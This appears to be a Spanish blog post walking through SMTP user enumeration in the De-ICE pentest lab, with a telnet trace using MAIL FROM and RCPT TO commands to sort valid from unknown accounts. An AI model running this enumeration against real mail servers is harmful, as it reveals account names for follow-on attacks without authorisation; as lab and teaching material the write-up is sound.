Hace un par de semanas, trasteando con una de las pruebas de pentest de De-ICE, utilicé un método de enumeración de usuarios un tanto peculiar, y poco utilizado: la enumeración mediante SMTP. ¿Y en qué consiste?
La idea es obtener nombres de usuario válidos en el sistema, generalmente como paso previo a algún tipo de ataque contra los mismos. Con el RFC en la mano, hay varias formas de hacerlo. Una muy básica sería, por ejemplo, utilizar el comando EXPN. En el caso de la prueba de pentest de De-ICE, dicho comando no era aceptado por el servidor (sería demasiado fácil).
Así pues, utilicé una alternativa: comenzar a redactar un correo, e intentar añadir usuarios como destinatarios (comando RCPT). Por supuesto, esto también tiene varias pegas: en primer lugar, el origen del correo debe especificarse antes (comando MAIL), lo cual quiere decir que debe tener un nombre de dominio válido, que sea resuelto correctamente por el servidor. En esta prueba en concreto, funcionó; pero no siempre será así, y dependerá fuertemente de la configuración (y el tipo) del servidor SMTP.
A continuación dejo una traza de ejemplo (spoiler alert: contiene parte de la solución), ejecutada contra una máquina virtual ejecutando el reto de De-ICE, desde una máquina virtual BackTrack.
root@bt:~# telnet 192.168.1.100 25
Trying 192.168.1.100…
Connected to 192.168.1.100.
Escape character is ‘^]’.
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Sun, 15 May 2011 20:05:14 GMT
help
214-2.0.0 This is sendmail version 8.13.7
214-2.0.0 Topics:
214-2.0.0 HELO EHLO MAIL RCPT DATA
214-2.0.0 RSET NOOP QUIT HELP VRFY
214-2.0.0 EXPN VERB ETRN DSN AUTH
214-2.0.0 STARTTLS
214-2.0.0 For more info use «HELP <topic>».
214-2.0.0 To report bugs in the implementation see
214-2.0.0
http://www.sendmail.org/email-addresses.html
214-2.0.0 For local information send email to Postmaster at your site.
214 2.0.0 End of HELP info
mail from:prueba@slax.example.net
250 2.1.0 prueba@slax.example.net… Sender ok
rcpt to:root
250 2.1.5 root… Recipient ok
rcpt to:adamsa
550 5.1.1 adamsa… User unknown
rcpt to:adama
550 5.1.1 adama… User unknown
rcpt to:aadams
250 2.1.5 aadams… Recipient ok
Deja un comentario